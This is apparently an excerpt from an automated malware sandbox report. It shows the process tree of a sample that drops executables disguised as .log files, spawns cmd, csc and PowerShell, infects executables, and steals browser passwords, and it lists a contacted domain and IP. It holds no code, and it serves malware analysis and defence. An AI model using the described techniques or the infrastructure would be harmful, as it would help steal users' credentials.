  Dropped: C:\Users\user\Desktop\xkMJxvqs.log, PE32; C:\Users\user\Desktop\oGDUNCaL.log, PE32; C:\Users\user\Desktop\hJPUkngW.log, PE32; 4 other malicious files
  Started: cmd.exe

0eDO5Zbs.exe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

13 other processes (started by start node)
  DNS/IP: 127.0.0.1 unknown unknown

cmd.exe (started by VQdUvAQ4xO.exe)
  Signatures: Uses ping.exe to sleep; Drops executables to the windows directory (C:\Windows) and starts them; Uses ping.exe to check the status of other devices and networks
  Started: r6Lr6XbTWt.exe; 3 other processes

csc.exe (started by VQdUvAQ4xO.exe)
  Dropped: C:\Windows\...\SecurityHealthSystray.exe, PE32
  Signatures: Infects executable files (exe, dll, sys, html)
  Started: conhost.exe; cvtres.exe (1)

powershell.exe (started by VQdUvAQ4xO.exe)
  Signatures: Loading BitLocker PowerShell Module
  Started: 2 other processes

cmd.exe (started by tNOtXAG6xwxcUNu9tjBa.exe)
  Started: tNOtXAG6xwxcUNu9tjBa.exe; conhost.exe

5 other processes (started by VQdUvAQ4xO.exe)
  Started: conhost.exe; 4 other processes

r6Lr6XbTWt.exe (started by cmd.exe)
  Signatures: Multi AV Scanner detection for dropped file

tNOtXAG6xwxcUNu9tjBa.exe (started by cmd.exe)
  DNS/IP: 525833cm.nyashnyash.ru 104.21.95.93, 49739, 49741, 49742 CLOUDFLARENETUS United States
  Dropped: C:\Users\user\Desktop\wMeJBGvi.log, PE32; C:\Users\user\Desktop\oiVTRNgB.log, PE32; C:\Users\user\Desktop\nluLvNRG.log, PE32; 4 other malicious files
  Signatures: Tries to harvest and steal browser information (history, passwords, etc)
